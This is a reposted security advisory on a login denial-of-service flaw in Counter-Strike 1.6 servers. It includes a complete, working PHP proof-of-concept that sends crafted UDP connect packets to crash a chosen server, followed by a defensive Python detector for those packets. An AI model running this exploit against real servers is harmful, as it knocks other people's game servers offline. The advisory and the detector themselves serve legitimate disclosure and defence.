Posted on 2009-2-3 20:19:44
Half-Life Counter-Strike Login Denial of Service Vulnerability
That is, what we usually call "炸F" (crashing the server).
Advisory date: 2008-01-07
Cause
Exceptional condition handling failure
Affected systems
Valve Software Half-Life Counter-Strike 1.6
Unaffected systems
Impact
A remote attacker can exploit this vulnerability to cause a denial of service against the application.
Attack prerequisites
The attacker must be able to access Half-Life Counter-Strike.
Vulnerability details
Half-Life Counter-Strike is a popular first-person shooter game.
Half-Life Counter-Strike does not correctly handle login requests; a remote attacker can exploit this to cause a denial of service against the application.
Submitting a malicious login request triggers this vulnerability.
Test method
----[ Counter Strike 1.6 Denial Of Service POC ... ITDefence.ru Antichat.ru ]
Counter Strike 1.6 Denial Of Service POC
Eugene Minaev underwater@itdefence.ru
Bug was found by Maxim Suhanov ( THE FUF )
works only with no-steam servers
-[ ITDEFENCE.ru Security advisory ]- 2007
```php
/*
CS-dos exploit made by underwater
Bug was discovered by .FUF
Big respect 2 Sax-mmS ( for html ) , Focs ( for his cs server ) , SkvoznoY , Bug(O)R,Antichat.ru and Cup.su
*/
ini_set("display_errors","0");

function HELLO_PACKET()
{
    $packet = pack("H*","FFFFFFFF");
    $packet .= "TSource Engine Query";
    $packet .= pack("H*","00");
    return $packet;
}

function CHALLENGE_PACKET()
{
    $packet = pack("H*","FFFFFFFF");
    $packet .= "getchallenge valve";
    $packet .= pack("H*","00");
    return $packet;
}

function LOGIN_PACKET_4()
{
    global $cookie;
    global $password;
    $packet = pack("H*","FFFFFFFF");
    $packet .= "connect 47 ";
    $packet .= $cookie.' "';
    $packet .= '\prot\4\unique\-1\raw\valve\cdkey\d506d189cf551620a70277a3d2c55bb2" "';
    $packet .= '\_cl_autowepswitch\1\bottomcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\mod';
    $packet .= 'el\gordon\name\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass';
    $packet .= 'word\\'.$password;
    $packet .= pack("H*","220A0000EE02");
    return $packet;
}

function LOGIN_PACKET_2()
{
    global $cookie;
    global $password;
    $packet = pack("H*","FFFFFFFF");
    $packet .= "connect 47 ";
    $packet .= $cookie.' "';
    $packet .= '\prot\2\raw\d506d189cf551620a70277a3d2c55bb2" "\_cl_autowepswitch\1\bott';
    $packet .= 'omcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\model\gordon\nam';
    $packet .= 'e\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass';
    $packet .= 'word\\'.$password;
    $packet .= pack("H*","22");
    return $packet;
}

function dowork($host,$port,$password,$auth)
{
    global $password;
    global $cookie;
    # connecting to target host
    $fsock = fsockopen("udp://".$host,(int) $port,$errnum,$errstr,2);
    if (!$fsock) die ($errstr);
    else
    {
        # sending hello packet
        fwrite ($fsock,HELLO_PACKET());
        fread ($fsock,100);
        # sending challenge packet
        fwrite ($fsock,CHALLENGE_PACKET());
        # receiving cookies
        $resp = fread($fsock,100);
        # grab cookies from packet
        $cookie = substr($resp,strpos($resp,"A00000000")+10);
        $cookie = substr($cookie,0,strpos($cookie," "));
        # sending login packet
        if (!$auth) fwrite ( $fsock,LOGIN_PACKET_4());
        else fwrite ( $fsock,LOGIN_PACKET_2());
        $resp = fread($fsock,100);
    }
}

if (isset($_POST['host']) && isset($_POST['port']))
{
    if (empty($_POST['pass'])) $password = "123";
    else $password = $_POST['pass'];
    $fserver = $_POST['host'];
    $fport = $_POST['port'];
    if (isset($_POST['auth'])) $fauth = true;
    else $fauth = false;
    # we have to connect 2 times
    $result = dowork($fserver,$fport,$password,$fauth);
    $result = dowork($fserver,$fport,$password,$fauth);
    # parsing result
    echo "Exploit Sent";
}
```
----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]
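As an added, defender-side example that is not part of the advisory or the PoC above: a small Python parser for the Half-Life connectionless UDP packets the PoC exchanges (the 0xFFFFFFFF header, "TSource Engine Query", "getchallenge" and "connect"), which decodes a connect packet's infostrings and flags sources that carry the PoC's hard-coded strings, send a malformed connect line, or exceed a connect-attempt threshold. The connect layout is assumed from how the PoC builds its strings, and the sample traffic is constructed, not captured.

```python
import re
from collections import Counter
HEADER = b"\xff\xff\xff\xff"  # connectionless marker on every packet the PoC sends
# Strings the PoC hard-codes into its connect packets, used here as signatures.
POC_SIGNATURES = (b"Born to be pig (..)", b"d506d189cf551620a70277a3d2c55bb2")
# Layout assumed from the PoC: connect <proto> <challenge> "<protinfo>" "<userinfo>"
CONNECT_RE = re.compile(rb'connect (\d+) (\S+) "([^"]*)" "([^"]*)')

def parse_infostring(s: bytes) -> dict:
    """Decode a \\key\\value infostring (the leading backslash gives an empty first field)."""
    parts = s.split(b"\\")[1:]
    return {k.decode(errors="replace"): v.decode(errors="replace")
            for k, v in zip(parts[0::2], parts[1::2])}

def parse_packet(data: bytes) -> dict:
    """Classify one UDP payload; decode the fields of a connect packet."""
    body = data[4:] if data.startswith(HEADER) else b""
    if body.startswith(b"TSource Engine Query"):
        return {"type": "query"}
    if body.startswith(b"getchallenge"):
        return {"type": "getchallenge"}
    if not body.startswith(b"connect "):
        return {"type": "other"}
    m = CONNECT_RE.match(body)
    if not m:  # header present but the connect line is not in the expected shape
        return {"type": "connect", "malformed": True}
    proto, challenge, protinfo, userinfo = m.groups()
    return {"type": "connect", "malformed": False, "proto": int(proto),
            "challenge": challenge.decode(errors="replace"),
            "protinfo": parse_infostring(protinfo), "userinfo": parse_infostring(userinfo),
            "poc_signature": any(sig in data for sig in POC_SIGNATURES)}

def flag_sources(packets, threshold: int = 3) -> dict:
    """packets: iterable of (src_ip, payload). A source is flagged if one of its connects
    is malformed or carries a PoC signature, or if it sends >= threshold connects (the PoC
    connects twice per run; set threshold from your own clients' retry baseline)."""
    connects, hits = Counter(), set()
    for src, raw in packets:
        p = parse_packet(raw)
        if p["type"] == "connect":
            connects[src] += 1
            if p["malformed"] or p["poc_signature"]:
                hits.add(src)
    return {src: {"connects": n, "suspicious": src in hits or n >= threshold}
            for src, n in connects.items()}

# Constructed sample traffic (not a real capture): PoC-style handshake, then a normal connect.
SAMPLE = [("10.0.0.5", HEADER + b"TSource Engine Query\x00"),
          ("10.0.0.5", HEADER + b"getchallenge valve\x00"),
          ("10.0.0.5", HEADER + b'connect 47 123456 "\\prot\\4\\unique\\-1\\raw\\valve\\cdkey\\'
                       b'd506d189cf551620a70277a3d2c55bb2" "\\name\\Born to be pig (..)\\password\\123"\n\x00\x00\xee\x02'),
          ("10.0.0.9", HEADER + b'connect 47 987654 "\\prot\\4\\unique\\-1\\raw\\valve\\cdkey\\0000" "\\name\\alice\\rate\\3500"\n')]
```

Feed `flag_sources` the (source address, UDP payload) pairs from a capture of the game server port; the signature match is only as good as the PoC's fixed strings, so the per-source connect count is the check that survives trivial edits to the PoC.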
Vendor solution
No solution is currently available:
http://www.valvesoftware.com/games.html
Reported by
Maxim Suhanov
Advisory link
http://www.securityfocus.com/bid/27159
Advisory title
Half-Life Counter-Strike Login Denial of Service Vulnerability